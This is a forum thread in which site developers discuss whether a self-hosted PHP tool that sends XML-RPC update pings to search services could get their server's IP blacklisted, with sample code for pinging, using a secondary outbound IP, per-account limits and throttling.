Can a Self-Hosted Ping Tool Hurt Your IP?
-
Confusing title, I know, but let me explain.
We are in the middle of programming a number of SEO "action" tools for our site. These will be available to users to help them better optimize their sites in the SERPs. We were thinking about adding a "Ping" tool built in PHP so users can ping their domain and hopefully get some extra attention/speed up indexing of updates.
This would be hosted on a subdomain of our site. My question is: if we get enough users using the product, could that potentially get us blacklisted with Google, Bing, etc.? Technically the tool needs to send out the ping request, and that request would come from the same IP address our main site is hosted on. If we end up with over 1,000 users all sending ping requests, I don't want to jeopardize our IP.
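For concreteness, the kind of ping we're talking about is usually a weblogUpdates.ping XML-RPC call. Here's a minimal PHP sketch, assuming the Ping-o-Matic endpoint; the site name and URL are illustrative placeholders:

<?php
// Minimal weblogUpdates.ping over XML-RPC. The endpoint is Ping-o-Matic's
// public XML-RPC URL; the site name and URL passed in are placeholders.
function sendPing($siteName, $siteUrl)
{
    $body = '<?xml version="1.0"?>'
        . '<methodCall>'
        . '<methodName>weblogUpdates.ping</methodName>'
        . '<params>'
        . '<param><value><string>' . htmlspecialchars($siteName) . '</string></value></param>'
        . '<param><value><string>' . htmlspecialchars($siteUrl) . '</string></value></param>'
        . '</params>'
        . '</methodCall>';

    $ch = curl_init('http://rpc.pingomatic.com/');
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $body,
        CURLOPT_HTTPHEADER     => ['Content-Type: text/xml'],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $response = curl_exec($ch); // XML-RPC response body, or false on failure
    curl_close($ch);
    return $response;
}

sendPing('Example Site', 'https://www.example.com/');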
Thoughts?
-
We are not using WordPress for any of the tools; everything will be handled in PHP. This is a separate directory from our main site, used strictly for the tools. Our main site does not use WordPress either.
The server resources are not an issue at this time, as we have a very powerful setup.
I am not worried about how many times a subscribed user wants to ping their site. I am more concerned about where the pings are being sent from and in what volume.
-
First of all, there is no certainty that pinging a domain helps get it indexed; submitting a sitemap in Search Console seems like the appropriate way to get that done.
I understand that pinging your site when you update content can let many sites, feed aggregators, and search engines know about it, but if you ping too much you risk getting blacklisted.
Second, using your server to send out many pings may slow its response time and therefore page load speed for your own site, which definitely has a negative effect on SEO.
Third, if you can host the service on a separate IP, that seems like the best course of action: if that IP gets blacklisted, you can just switch to a different one rather than risking your domain's IP.
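If the box already has a spare IP assigned, cURL can also pin outbound requests to it via CURLOPT_INTERFACE. A minimal sketch; 203.0.113.5 is an illustrative address that would already need to be bound to one of the server's interfaces:

<?php
// Send pings from a secondary IP so the main site's IP is never the source.
// 203.0.113.5 is a placeholder for an extra address configured on the server.
$ch = curl_init('http://rpc.pingomatic.com/');
curl_setopt($ch, CURLOPT_INTERFACE, '203.0.113.5'); // outbound source address
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// ...set the XML-RPC POST body as in the earlier ping sketch...
$response = curl_exec($ch);
curl_close($ch);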
Maybe I'm missing something here, but if you are using WordPress, doesn't it automatically create an auto-updating /feed/ URL for your site?
The following is from https://en.support.wordpress.com/comments/pingbacks/:
Granted, I use WordPress, so that is mostly what I focus on. Are you using a different CMS?
How do I send out update pings?
Many services like Technorati, Feedster, Icerocket, Google Blog Search, and others want a “ping” from you to know you’ve updated so they can index your content. WordPress.com handles it all for you. When you post, we send a ping using Ping-o-Matic!, which is a service that pings several different search providers all at once, including Technorati, My Yahoo!, and Google Blog Search.
Pings are automatically sent if you have a public blog. If your blog is private or if you block search engines, pings will not be sent.
-
Yup!
Use "javascript" on client site to do pinging. Or Java app running from web as applet. Or Flash.
There are two major problems - javascript doesn't support cross-platform post without hacks. And not all computers comes with Java. Same is with Flash.
-
Thank you for your response. As to the IP getting blacklisted: since we have full server control, we could always assign another dedicated IP address to the site. The issue is that we would not know if and when it happened in order to take such action. Obviously we don't want to have to do this, and a blacklisted main-site IP could create headaches for our search position until we got it resolved.
We are also planning to add website submission limits. For example, you could only submit mysitehere.com up to 3 times per month per subscriber account. The only way someone could spam the system would be to create another account and sign up all over again. I doubt anyone would go through that much effort, but I could be wrong.
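For what it's worth, a minimal sketch of that per-account cap, assuming a PDO connection, MySQL-flavored SQL, and a hypothetical ping_log table with account_id, domain, and pinged_at columns:

<?php
// Enforce "max 3 submissions per domain per subscriber per month".
// ping_log(account_id, domain, pinged_at) is a hypothetical table.
function canSubmit(PDO $db, $accountId, $domain, $limit = 3)
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM ping_log
          WHERE account_id = :account
            AND domain = :domain
            AND pinged_at >= DATE_SUB(NOW(), INTERVAL 1 MONTH)'
    );
    $stmt->execute([':account' => $accountId, ':domain' => $domain]);
    return (int) $stmt->fetchColumn() < $limit;
}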
Thoughts?
-
TL;DR - YES
Long story: I'm the author of a similar desktop tool called SEOPingler:
http://www.mobiliodevelopment.com/seopingler/
so anyone can use it to ping anything, and bots arrive within a second or two. This works perfectly. The problem is when you use it to ping many URLs (like 10k-20k). At some point it stops working: the ping API endpoint still receives your requests, but I can't see any bots coming. This means there is some per-IP threshold, and if you pass it your IP is temporarily blacklisted. I have also heard (but can't confirm) that the length of that temporary blacklisting may vary with previous usage. For a desktop tool this isn't a problem, because users only blacklist their own IPs, and they can switch to hotspot Wi-Fi or a VPN to continue pinging.
But on a server this will be a HUGE problem, because you can't switch IPs on the fly, and no one can guarantee how long your IP will be blacklisted.
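If you do run it server-side anyway, about the only mitigation is to throttle hard and stay well under whatever the threshold is. A rough sketch; the delay and daily cap are illustrative guesses, not documented limits:

<?php
// Spread pings out over time instead of bursting, and cap the daily total.
// Both numbers are guesses; the real per-IP thresholds are undocumented.
const MAX_PINGS_PER_DAY = 500;
const DELAY_SECONDS     = 10;

function drainQueue(array $urls, callable $sendPing)
{
    $sent = 0;
    foreach ($urls as $url) {
        if ($sent >= MAX_PINGS_PER_DAY) {
            break; // leave the rest for the next day's run
        }
        $sendPing($url);
        $sent++;
        sleep(DELAY_SECONDS); // pace requests rather than bursting
    }
}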